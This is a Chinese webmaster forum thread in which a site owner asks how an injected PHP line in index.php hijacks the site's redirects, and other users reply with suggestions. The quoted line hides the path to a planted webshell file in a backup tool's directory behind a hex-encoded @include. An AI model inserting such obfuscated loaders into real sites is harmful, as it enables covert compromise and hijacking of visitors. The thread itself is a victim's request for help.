落英缤纷 发表于 2016-8-25 20:20:47

如何实现劫持跳转的?

本帖最后由 落英缤纷 于 2016-8-27 16:27 编辑


<?php
@include(PACK('H*','2F7573722F686F6D652F717875323036303432303135392F6874646F63732F6261636B75702F636C6173732F64625F696E632E706870'));
?>
<?php

这一段代码如何实现劫持网站跳转的?刚从INDEX.PHP里发现的

今天搜索了一下所有目录,找到一个webshell文件 我昨天从PHP控制台里关闭了上传功能 怪不得今天WEBSHELL存在 也劫持不了

把这个传上来给大家看看

鱼羊小子 发表于 2016-8-25 20:25:23

@include改为exit看看就知道了

落英缤纷 发表于 2016-8-25 20:52:37

鱼羊小子 发表于 2016-8-25 20:25
@include改为exit看看就知道了

感谢

在帝国备份王目录发现隐藏了一个文件



看内容应该不是帝国的

锅牛 发表于 2016-8-25 20:57:12

不懂。

落英缤纷 发表于 2016-8-25 20:58:03

再次检查了帝国原版文件 没有这个文件 麻痹 被坑了 干脆把帝国目录删除了 重新上传最新的

垃圾中的战斗机 发表于 2016-8-25 21:01:59

被黑了,肯定还有另外的文件

念冰。 发表于 2016-8-25 21:41:36

:lol:有备份么,我帮你看看

vison 发表于 2016-8-25 22:13:22

楼主用什么主机?独立的服务器吗

aku138 发表于 2016-8-25 22:15:57

大平台就是如此

落英缤纷 发表于 2016-8-26 15:39:28

今天又被劫持了 我操 干脆删除了帝国目录了 服了 class/db_inc.php
页: [1] 2
查看完整版本: 如何实现劫持跳转的?